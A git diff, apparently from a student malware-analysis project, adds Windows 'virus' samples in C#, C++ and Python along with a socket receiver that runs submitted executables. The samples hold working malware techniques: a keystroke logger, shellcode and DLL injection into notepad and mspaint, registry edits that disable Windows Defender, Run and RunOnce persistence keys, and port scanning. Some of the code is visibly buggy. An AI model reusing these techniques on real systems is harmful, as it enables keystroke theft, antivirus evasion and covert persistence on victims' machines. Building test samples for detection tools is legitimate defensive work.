diff --git a/Exe_Virus_Code/c_sharp_virus.cs b/Exe_Virus_Code/c_sharp_virus.cs new file mode 100644 index 0000000..2c619b9 --- /dev/null +++ b/Exe_Virus_Code/c_sharp_virus.cs @@ -0,0 +1,251 @@ +using System; +using System.Diagnostics; +using System.IO; +using System.Runtime.InteropServices; + +namespace regular_exe +{ + internal class Program + { + /// Sockets + // Import the socket function + [DllImport("Ws2_32.dll", SetLastError = true)] + static extern IntPtr socket( + int af, + int type, + int protocol); + + // Constants for the socket function + const int AF_INET = 2; + const int SOCK_STREAM = 1; + const int IPPROTO_TCP = 6; + + // Import the connect function + [DllImport("Ws2_32.dll", SetLastError = true)] + static extern int connect( + IntPtr socket, + byte[] socketAddress, + int socketAddressSize); + + // Files + [DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)] + public static extern IntPtr CreateFileA( + [MarshalAs(UnmanagedType.LPStr)] string filename, + [MarshalAs(UnmanagedType.U4)] FileAccess access, + [MarshalAs(UnmanagedType.U4)] FileShare share, + IntPtr securityAttributes, + [MarshalAs(UnmanagedType.U4)] FileMode creationDisposition, + [MarshalAs(UnmanagedType.U4)] FileAttributes flagsAndAttributes, + IntPtr templateFile); + + // Import the RegCreateKeyExA function + [DllImport("advapi32.dll", CharSet = CharSet.Ansi, SetLastError = true)] + + // Define RegCreateKeyExA + static extern int RegCreateKeyExA( + UIntPtr hKey, + string lpSubKey, + int Reserved, + string lpClass, + int dwOptions, + int samDesired, + IntPtr lpSecurityAttributes, + out UIntPtr phkResult, + out int lpdwDisposition); + + // Define RegOpenKeyEx + [DllImport("advapi32.dll", CharSet = CharSet.Unicode)] + static extern int RegOpenKeyEx( + uint hKey, + string subKey, + uint options, + uint samDesired, + out IntPtr phkResult + ); + + // Define RegSetVAlueEx + [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)] + static extern int RegSetValueEx( + IntPtr hKey, + string lpValueName, + int Reserved, + uint dwType, + string lpData, + uint cbData + ); + + // Imports the RegCloseKey function from advapi32.dll + [DllImport("advapi32.dll")] + static extern int RegCloseKey(IntPtr hKey); + + // Constants for the RegCreateKeyExA function + const int REG_OPTION_NON_VOLATILE = 0; + const int REG_CREATED_NEW_KEY = 1; + + public static UIntPtr HKEY_LOCAL_MACHINE = new UIntPtr(0x80000002u); + public static UIntPtr HKEY_CURRENT_USER = new UIntPtr(0x80000001u); + + const uint KEY_SET_VALUE = 0x0002; + const uint ERROR_SUCCESS = 0; + const uint REG_SZ = 1; + + // Imports the Sleep function from kernel32.dll + [DllImport("kernel32.dll")] + static extern void Sleep(int dwMilliseconds); + + // Imports the CreateThread function from kernel32.dll + [DllImport("kernel32", CharSet = CharSet.Ansi)] + public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, + IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); + + // Imports the DeleteFileA function from kernel32.dll + [DllImport("kernel32.dll", SetLastError = true)] + [return: MarshalAs(UnmanagedType.Bool)] + + static extern bool DeleteFileA([MarshalAs(UnmanagedType.LPStr)] string lpFileName); + + // Imports the OpenProcess function from kernel32.dll + [DllImport("kernel32.dll", SetLastError = true)] + static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId); + + // Imports the WriteProcessMemory function from kernel32.dll + [DllImport("kernel32.dll", SetLastError = true)] + static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int nSize, out IntPtr lpNumberOfBytesWritten); + + // Imports the VirtualAllocEx function from kernel32.dll + [DllImport("kernel32.dll", SetLastError = true)] + static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, int dwSize, int flAllocationType, int flProtect); + + // Imports the CreateRemoteThread function from kernel32.dll + [DllImport("kernel32.dll", SetLastError = true)] + static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, int dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, int dwCreationFlags, out IntPtr lpThreadId); + + + static void Main(string[] args) + { + /// + /// Entry point of the program. + /// + /// Command-line arguments. + Sleep(2000); + + // Create a file + IntPtr a = CreateFileA("C:\\Windows:\\System32\\virus.txt", FileAccess.Write, FileShare.None, IntPtr.Zero, FileMode.CreateNew, FileAttributes.Normal, IntPtr.Zero); + + //uint dwHandle = (uint)CreateThread((IntPtr)0, (uint)4096, (IntPtr)null, (IntPtr)null, (uint)0, (IntPtr)null); + //if (dwHandle == 0) throw new Exception("Unable to create thread!"); + + // Delete a File + DeleteFileA("what_is_up.txt"); + + // if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Policies\\Microsoft\\Windows Defender", 0, 1, UIntPtr(0) == 0) + + // Open the HKEY_CURRENT_USER root key + UIntPtr keyHandle; + int disposition; + int result = RegCreateKeyExA( + HKEY_CURRENT_USER, + " A_Virus_Key", + 0, + null, + REG_OPTION_NON_VOLATILE, + 0, + IntPtr.Zero, + out keyHandle, + out disposition); + + // Registry key location + //string keyPath = @"Software\Microsoft\Windows\CurrentVersion\Run"; + //string valueName = "MyVirus"; + //const uint HKEY_LOCAL_MACHINE = 0x80000002; + + //// Path to the virus executable + //string exePath = @"D:\Cyber\YB_CYBER\project\FinalProject\poc_start\poc_start\unrelated\c#_exe\virus.exe"; + + //// Open the registry key + //IntPtr hKey; + //int result = RegOpenKeyEx( + // HKEY_LOCAL_MACHINE, + // keyPath, + // 0, + // KEY_SET_VALUE, + // out hKey + //); + + //// Add the virus executable path to the registry key + //result = RegSetValueEx( + // hKey, + // valueName, + // 0, + // REG_SZ, + // exePath, + // (uint)(exePath.Length + 1) * 2 + //); + + //// Close the registry key + //RegCloseKey(hKey); + + + + //int port = 80; + //while (port < 83) + //{ + + // Console.WriteLine($"Trying to connect to host through port {port}"); + // // Parse the target host and port from the command line arguments + // string host = "142.250.186.68"; + + // // Resolve the target host to an IP address + // IPHostEntry hostEntry = Dns.GetHostEntry(host); + // IPAddress[] addresses = hostEntry.AddressList; + + // // Create a socket for connecting to the target host + // IntPtr socketHandle = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); + // if (socketHandle == IntPtr.Zero) + // { + // continue; + // } + + // // Create a socket address for the target host and port + // EndPoint endPoint = new IPEndPoint(addresses[0], port); + // int endPointSize = endPoint.Serialize(); + // byte[] socketAddress = new byte[endPointSize]; + // Buffer.BlockCopy(endPoint.Serialize(), 0, socketAddress, 0, endPointSize); + + // // Try to connect to the target host and port + // result = connect(socketHandle, socketAddress, endPointSize); + // if (result != 0) + // { + // continue; + // } + // Console.WriteLine($"Successfully connected to host through port {port}"); + //} + + // Get the process ID of the process you want to inject the shell code into + // Get the process by its name + Process process = Process.GetProcessesByName("notepad")[0]; + + // Get the process ID + int processId = process.Id; + + // Open a handle to the process with the necessary privileges + IntPtr targetProcessHandle = OpenProcess(0x1F0FFF, false, processId); + + // Allocate memory in the process's address space + IntPtr shellCodeAddress = VirtualAllocEx(targetProcessHandle, IntPtr.Zero, 1024, 0x1000, 0x40); + + // Write the shell code to the allocated memory + byte[] shellCode = new byte[] { + 0x68, 0x48, 0x65, 0x6C, 0x6C, 0x6F, 0x20, 0x57, 0x6F, 0x72, 0x6C, 0x64, 0x21, // push "Hello World!" + 0x68, 0x54, 0x68, 0x69, 0x73, 0x20, 0x69, 0x73, 0x20, 0x61, 0x20, 0x6D, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x2E, // push "This is a message." + 0xB8, 0x04, 0x00, 0x00, 0x00, // mov eax, 4 + 0x6A, 0x00, // push 0 + 0xFF, 0xD0 }; // call eax // Replace this with your actual shell code + WriteProcessMemory(targetProcessHandle, shellCodeAddress, shellCode, shellCode.Length, out IntPtr bytesWritten); + + // Create a remote thread in the process to execute the shell code + CreateRemoteThread(targetProcessHandle, IntPtr.Zero, 0, shellCodeAddress, IntPtr.Zero, 0, out IntPtr threadId); + + } + } +} \ No newline at end of file diff --git a/Exe_Virus_Code/keyboard_hook.cpp b/Exe_Virus_Code/keyboard_hook.cpp new file mode 100644 index 0000000..8680c66 --- /dev/null +++ b/Exe_Virus_Code/keyboard_hook.cpp @@ -0,0 +1,83 @@ +#include +#include + +HHOOK hHook; +bool exit_program = false; + +LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam) { + + /** + * Keyboard hook procedure. + * + * This function is called whenever a keyboard event is detected. It performs the following tasks: + * 1. Retrieves the pressed key. + * 2. Opens a file to write the sensitive information. + * 3. Writes the key to the file. + * + * @param nCode The hook code. + * @param wParam The event type. + * @param lParam A pointer to a KBDLLHOOKSTRUCT structure that contains details about the keyboard event. + * @return The result of the next hook procedure in the hook chain. + */ + + if (nCode == HC_ACTION) { + KBDLLHOOKSTRUCT* p = (KBDLLHOOKSTRUCT*)lParam; + WCHAR key[2]; + WORD scanCode = p->scanCode; + BYTE keyboardState[256]; + GetKeyboardState(keyboardState); + ToUnicode(p->vkCode, scanCode, keyboardState, key, 2, 0); + HANDLE hFile; + DWORD dwBytesWritten; + + // Open the file to write the sensitive information + hFile = CreateFileA("sensitive_info.txt", GENERIC_WRITE, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); + if (hFile == INVALID_HANDLE_VALUE) { + return 1; + } + SetFilePointer(hFile, 0, NULL, FILE_END); + WriteFile(hFile, &key, sizeof(key), &dwBytesWritten, NULL); + CloseHandle(hFile); + } + if (exit_program) + { + UnhookWindowsHookEx(hHook); + return 1; + } + return CallNextHookEx(hHook, nCode, wParam, lParam); +} + + +int main() { + /** + * The main function of the program. + * + * This function sets up a keyboard hook and runs a loop for a specified duration. It performs the following tasks: + * 1. Sets up the keyboard hook to capture keyboard events. + * 2. Runs a loop for 5 seconds to capture keyboard events. + * + * @return An integer representing the exit status of the program. + */ + + // Set up the keyboard hook + hHook = SetWindowsHookExA(WH_KEYBOARD_LL, KeyboardProc, GetModuleHandle(NULL), 0); + if (hHook == NULL) { + return 1; + } + + // Calculate the end time of the program (5 seconds from now) + DWORD start = GetTickCount(); + DWORD end = start + 5000; + + MSG msg; + while (!exit_program) { + if (GetTickCount() >= end) { + exit_program = true; + } + if (PeekMessage(&msg, NULL, 0, 0, PM_REMOVE)) { + TranslateMessage(&msg); + DispatchMessage(&msg); + } + } + return 0; +} \ No newline at end of file diff --git a/Exe_Virus_Code/mspaint_virus.cpp b/Exe_Virus_Code/mspaint_virus.cpp new file mode 100644 index 0000000..48485bc --- /dev/null +++ b/Exe_Virus_Code/mspaint_virus.cpp @@ -0,0 +1,347 @@ +// Importing the required moduldes +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +using std::ostringstream; +using std::ends; +#pragma comment(lib, "ws2_32.lib") + +// Path to the evil DLL file +char evilDLL[] = "E:\\Cyber\\YB_CYBER\\project\\FinalProject\\ExeFiles\\ExeFiles\\evil.dll"; +unsigned int evilLen = sizeof(evilDLL) + 1; + +// Queue to store port numbers for scanning +std::queue port_queue; +std::mutex mut; + + +DWORD port_scanner(int port, char* ip) { + /** + * Performs port scanning on a specified IP address and port number using Winsock. + * @param port The port number to scan. + * @param ip The IP address to connect to. + * @return The result of the port scanning operation. + */ + WSADATA wsa; + + printf("\nInitialising Winsock..."); + if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) + { + printf("Failed. Error Code : %d", WSAGetLastError()); + return 1; + } + + printf("Initialised.\n"); + + SOCKET s; + struct sockaddr_in sock; + + // Create a socket + if ((s = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) + { + printf("Could not create socket : %d", WSAGetLastError()); + } + + printf("Socket created.\n"); + + + sock.sin_addr.s_addr = inet_addr(ip); + sock.sin_family = AF_INET; + sock.sin_port = htons(port); + + // Connect to remote server + int iResult = connect(s, (struct sockaddr*)&sock, sizeof(sock)); + if (iResult == SOCKET_ERROR) + { + std::cout << "No success :( in connecting to port " << port << std::endl; + } + else { + std::cout << "Succcess :) Connected to port " << port << std::endl; + } + return 0; +} + + +void run() { + /** + * Performs port scanning by dequeuing ports from the port_queue and calling the port_scanner function. + */ + //mut.lock(); + while (!port_queue.empty()) { + int port = port_queue.front(); + port_scanner(port, (char*)"142.250.186.68"); + port_queue.pop(); + } + //mut.unlock(); +} + + +DWORD FindProcessId(const std::wstring& processName) +{ + /** + * Finds the process ID (PID) of a specified process name. + * @param processName The name of the process. + * @return The process ID (PID) of the specified process, or 0 if not found. + */ + PROCESSENTRY32 processInfo; + processInfo.dwSize = sizeof(processInfo); + + HANDLE processesSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL); + if (processesSnapshot == INVALID_HANDLE_VALUE) { + return 0; + } + + Process32First(processesSnapshot, &processInfo); + if (!processName.compare(processInfo.szExeFile)) + { + //CloseHandle(processesSnapshot); + return processInfo.th32ProcessID; + } + + while (Process32Next(processesSnapshot, &processInfo)) + { + if (!processName.compare(processInfo.szExeFile)) + { + //CloseHandle(processesSnapshot); + return processInfo.th32ProcessID; + } + } + + //CloseHandle(processesSnapshot); + return 0; +} + + +int CreateSocket() +{ + /** + * Creates a socket and connects to a remote server. + * @return The result of the socket creation and connection. + */ + WSADATA wsa; + SOCKET s; + struct sockaddr_in server; + const char* message; + int recv_size; + char server_reply[3000] = { 0 }; + + printf("\nInitialising Winsock..."); + if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) + { + printf("Failed. Error Code : %d", WSAGetLastError()); + return 1; + } + + printf("Initialised.\n"); + + // Create a socket + if ((s = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) + { + printf("Could not create socket : %d", WSAGetLastError()); + } + + printf("Socket created.\n"); + + + server.sin_addr.s_addr = inet_addr("142.250.186.68"); + server.sin_family = AF_INET; + server.sin_port = htons(80); + + // Connect to remote server + if (connect(s, (struct sockaddr*)&server, sizeof(server)) < 0) + { + puts("connect error"); + return 1; + } + + puts("Connected"); + + // Send some data + message = "GET / HTTP/1.1\r\n\r\n"; + if (send(s, message, strlen(message), 0) < 0) + { + puts("Send failed"); + return 1; + } + puts("Data Sent\n"); + + // Receive a reply from the server + if ((recv_size = recv(s, server_reply, 2000, 0)) == SOCKET_ERROR) + { + puts("recv failed"); + } + + puts("Reply received\n"); + + //Add a NULL terminating character to make it a proper string before printing + //server_reply[recv_size] = '\0'; + + return 0; + +} + + +int main() +{ + /** + * The main function of the function + * including File, Registry, DLL Injection operations + * @return None + */ + + // Sleep and create file + Sleep(2000); + HANDLE hFile = CreateFileA("C:\\Program Files\\evil.cpp", // name of the write + GENERIC_WRITE, // open for writing + 0, // do not share + NULL, // default security + CREATE_NEW, // create new file only + FILE_ATTRIBUTE_NORMAL, // normal file + NULL); // no attr. template + + if (!(hFile == INVALID_HANDLE_VALUE)) { + DWORD err = GetLastError(); + std::cout << "err " << err << std::endl; + printf("Could not open file\n"); + } + else + printf("Successfully opened file\n"); + + // Allocate space + LPVOID address = VirtualAlloc(NULL, 11, MEM_COMMIT, PAGE_EXECUTE_READWRITE); + + hFile = CreateFileA("evil.txt", // name of the write + GENERIC_WRITE, // open for writing + 0, // do not share + NULL, // default security + CREATE_NEW, // create new file only + FILE_ATTRIBUTE_NORMAL, // normal file + NULL); // no attr. template + + if (!(hFile == INVALID_HANDLE_VALUE)) + printf("Could not open file\n"); + else + printf("Successfully opened file\n"); + + address = VirtualAlloc(NULL, 11, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + + //CreateThread(NULL, NULL, NULL, NULL, NULL, NULL); + //CreateThread(NULL, NULL, NULL, NULL, NULL, NULL); + + // Try to Disable the windows defender through registry. + HKEY key; + HKEY new_key; + DWORD disable = 1; + LONG res = RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SOFTWARE\\Policies\\Microsoft\\Windows Defender", 0, KEY_ALL_ACCESS, &key); + RegSetValueExA(key, "DisableAntiSpyware", 0, REG_DWORD, (const BYTE*)&disable, sizeof(disable)); + RegCreateKeyExA(key, "Real-Time Protection", 0, 0, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, 0, &new_key, 0); + + + + // adding calling process to run + //HKEY hOpened; + //char pPath[100]; + //GetModuleFileNameA(0, pPath, 100); + //RegOpenKeyExA(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_ALL_ACCESS, &hOpened); + + // Path to virus + HKEY hKey; + char pPath[100]; + char exePath[] = "D:\\Cyber\\YB_CYBER\\project\\FinalProject\\c_sharp_exe\\regular_exe\\regular_exe\\bin\\x86\\Debug\\virus.exe"; + + // Get the path of the current executable + GetModuleFileNameA(NULL, pPath, sizeof(pPath)); + + // Create a key "MyVirus" in a Run Key and add tthe exePath to it + RegOpenKeyExA(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_ALL_ACCESS, &hKey); + RegSetValueExA(hKey, "MyVirus", 0, REG_SZ, (BYTE*)exePath, strlen(exePath) + 1); + + // Try to read SystemRoot value + // The "SystemRoot" registry key typically contains the path to the Windows installation directory on the system. + char value[255]; + DWORD BufferSize = 8192; + RegGetValueA(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "SystemRoot", RRF_RT_ANY, NULL, (PVOID)&value, &BufferSize); + + // Activate Port Scanning + for (size_t i = 80; i <= 82; i++) + { + port_queue.push(i); + } + run(); + + // Create the Socket + int zero = CreateSocket(); + + // Trying to delete a file + if (DeleteFileA("E:\\Cyber\\YB_CYBER\\project\\FinalProject\\De_Bug\\De_Bug\\hello.txt") != 0) + printf("success in deleting hello.txt"); + + // Write data to the file + std::string strText = "Hello World!"; // For C use LPSTR (char*) or LPWSTR (wchar_t*) + //DWORD bytesWritten; + OVERLAPPED ov{ 0 }; + LPOVERLAPPED_COMPLETION_ROUTINE l{ 0 }; + WriteFileEx( + hFile, // Handle to the file + strText.c_str(), // Buffer to write + strText.size(), // Buffer size + &ov, // Overlapped + l); + + WriteFile(hFile, strText.c_str(), strText.size(), NULL, NULL); + + // Dll injection + DWORD pid = 0; // process ID + HANDLE ph; // process handle + HANDLE rt; // remote thread + LPVOID rb; // remote buffer + + // Handle to kernel32 and pass it to GetProcAddress + HMODULE hKernel32 = GetModuleHandle(L"Kernel32"); + VOID* lb = GetProcAddress(hKernel32, "LoadLibraryA"); + + // Get process ID by name + pid = FindProcessId(L"mspaint.exe"); + if (pid == 0) { + printf("PID not found :( exiting...\n"); + return -1; + } + else { + printf("PID = %d\n", pid); + } + + // Open process + ph = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(pid)); + + // Allocate memory buffer for remote process + rb = VirtualAllocEx(ph, NULL, evilLen, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE); + + // "Copy" evil DLL between processes + WriteProcessMemory(ph, rb, evilDLL, evilLen, NULL); + + // Our process start new thread + rt = CreateRemoteThread(ph, NULL, 0, (LPTHREAD_START_ROUTINE)lb, rb, 0, NULL); + if (!rt) { + DWORD err = GetLastError(); + std::cout << err << std::endl; + } + CloseHandle(ph); + + return 0; + +} \ No newline at end of file diff --git a/Exe_Virus_Code/python_virus.py b/Exe_Virus_Code/python_virus.py new file mode 100644 index 0000000..a6ddd05 --- /dev/null +++ b/Exe_Virus_Code/python_virus.py @@ -0,0 +1,95 @@ +import ctypes +import os +import platform +import binascii + +data = binascii.unhexlify("b80a000000c3") + +GENERIC_ALL = 0x10000000 +CREATE_NEW = 1 +FILE_ATTRIBUTE_NORMAL = 0x80 + +ctypes.windll.kernel32.Sleep(3000) +file_handle = ctypes.windll.kernel32.CreateFileA("example.txt".encode("ascii"), GENERIC_ALL, 0, None, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, None) + +# Open a handle to the process +pid = os.getpid() +hProcess = ctypes.windll.kernel32.OpenProcess(ctypes.c_int(0x1F0FFF), False, ctypes.c_int(pid)) + +# Allocate memory in the process for the data to be written +address = ctypes.windll.kernel32.VirtualAllocEx(hProcess, None, ctypes.c_int(len(data)), ctypes.c_int(0x1000), ctypes.c_int(0x40)) + +# Write the data to the memory address +ctypes.windll.kernel32.WriteProcessMemory(hProcess, address, data, ctypes.c_int(len(data)), None) + +# Close the handle to the process +ctypes.windll.kernel32.CloseHandle(hProcess) + +# Load the Winsock library +winsock = ctypes.windll.Ws2_32 + +for port in [78, 79, 80]: + # Create a socket + s = ctypes.c_int(0) + s.value = winsock.socket(2, 1, 6) + + # Connect to google.com + target = ctypes.create_string_buffer(b"google.com\0") + address = ctypes.create_string_buffer(b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00") + winsock.getaddrinfo(target, None, None, ctypes.byref(address)) + port = ctypes.c_ushort(port) + result = winsock.connect(s, address, ctypes.sizeof(address), port) + + # Check the result of the connection + if result == 0: + print("Connected to google.com on port", port) + else: + print("Failed to connect to google.com on port", port) + + # Close the socket + winsock.closesocket(s) + + +# Registry +# shell +shell = "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce" + +# evil app +exe = "C:\\Users\\IEUser\\Desktop\\research\\2023-01-20-malware-pers-21\\hack.exe".encode('utf-8') + +# open registry key +hkey = ctypes.c_void_p() +res = ctypes.windll.advapi32.RegOpenKeyExW(ctypes.c_uint32(0x8), # HKEY_LOCAL_MACHINE + shell, + 0, + 0x00020019, # KEY_WRITE + ctypes.byref(hkey) +) + +if res == 0: + # create sub-key + hkR = ctypes.c_void_p() + res = ctypes.windll.advapi32.RegCreateKeyExW( + hkey, + "open\\command", + 0, + None, + 0, # REG_OPTION_NON_VOLATILE + 0x000f003f, # KEY_ALL_ACCESS + None, + ctypes.byref(hkR), + None + ) + + if res == 0: + # set registry key value + res = ctypes.windll.advapi32.RegSetValueExW( + hkR, + None, + 0, + 1, # REG_SZ + exe, + len(exe) + ) + ctypes.windll.advapi32.RegCloseKey(hkR) + ctypes.windll.advapi32.RegCloseKey(hkey) diff --git a/Exe_Virus_Code/registry_virus.cpp b/Exe_Virus_Code/registry_virus.cpp new file mode 100644 index 0000000..4eeb9ab --- /dev/null +++ b/Exe_Virus_Code/registry_virus.cpp @@ -0,0 +1,35 @@ +// Importing the required modules +#include +#include +#include + +int main(int argc, char* argv[]) { + /** + * The main function of the program. + * + * This function is the entry point of the program. It performs the following tasks: + * 1. Waits for 3 seconds. + * 2. Opens a registry key for writing. + * 3. Creates a new registry entry to execute a malicious application on startup. + * + * @param argc The number of command-line arguments passed to the program. + * @param argv An array of strings containing the command-line arguments. + * @return An integer representing the exit status of the program. + */ + + // Wait for 3 seconds before proceeding + Sleep(3000); + HKEY hkey = NULL; + + // Path to the malicious application + const char* exe = "D:\\Cyber\\YB_CYBER\\project\\FinalProject\\De_Bug\\De_Bug\\mewo.exe"; + + // Open the registry key for startup programs under HKEY_CURRENT_USER + LONG res = RegOpenKeyExA(HKEY_CURRENT_USER, (LPCSTR)"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_WRITE, &hkey); + + // Set the value of the registry key to the path of the malicious application + RegSetValueExA(hkey, (LPCSTR)"RunVirus", 0, REG_SZ, (unsigned char*)exe, strlen(exe)); + RegCloseKey(hkey); + + return 0; +} diff --git a/receiver.py b/receiver.py index 1e4dafa..a405efd 100644 --- a/receiver.py +++ b/receiver.py @@ -2,23 +2,25 @@ from socket import socket, AF_INET, SOCK_STREAM import os from subprocess import Popen - import psutil - from unrelated.sys_internals.extract import SysInternals #os.system(r'python D:\\Cyber\\YB_CYBER\\project\\FinalProject\\poc_start\\poc_start\\unrelated\\vt_hash.py') + +# Constants FILE_NAME_TO_SAVE = "virus.exe" FILE_NAME_TO_SEND = "LOG.txt" +# Opening socket server_sock = socket(AF_INET, SOCK_STREAM) server_sock.bind(("0.0.0.0", 9999)) server_sock.listen() print("Server now listening...") +# Accepting connection sock, _ = server_sock.accept() -# receiving file +# Receiving file file_to_recv_size = struct.unpack("I", sock.recv(struct.calcsize("I")))[0] file = b'' while len(file) < file_to_recv_size: @@ -32,37 +34,44 @@ quit() file = file + file_fragment +# Saving received file with open(FILE_NAME_TO_SAVE, "wb") as f: f.write(file) +# Running necessary commands os.system('..') os.system('Z:\\E\\Cyber\\YB_CYBER\\project\\FinalProject\\poc_start\\poc_start') os.startfile('Z:\\E\\Cyber\\YB_CYBER\\project\\FinalProject\\poc_start\\poc_start\\poc_start.exe') -a = input() - -# while "poc_start.exe" in [p.name() for p in psutil.process_iter()]: -# pass -# while "virus.exe" in [p.name() for p in psutil.process_iter()]: -# pass +# a = input() +# Waiting for processes to finish +while "poc_start.exe" in [p.name() for p in psutil.process_iter()]: + pass +while "virus.exe" in [p.name() for p in psutil.process_iter()]: + pass +# Appending LOG_MEMORY.txt contents to LOG.txt while not os.path.exists("LOG.txt") and not os.path.exists("LOG_MEMORY.txt"): pass +# Sending file to the local machine with open('LOG_MEMORY.txt', 'r') as file1, open('LOG.txt', 'a') as file2: file2.write(file1.read()) # while not os.path.getsize("LOG.txt") / 1024 >= 2: # pass +# Running handle.exe on the file with open(FILE_NAME_TO_SEND, "rb") as f: file_to_send_data = f.read() sock.sendall(struct.pack("I", len(file_to_send_data)) + file_to_send_data) print("Send report to local machine") +# Run handle.exe on the file s = SysInternals() s.run_handle() +# Closing socket and server socket sock.close() server_sock.close()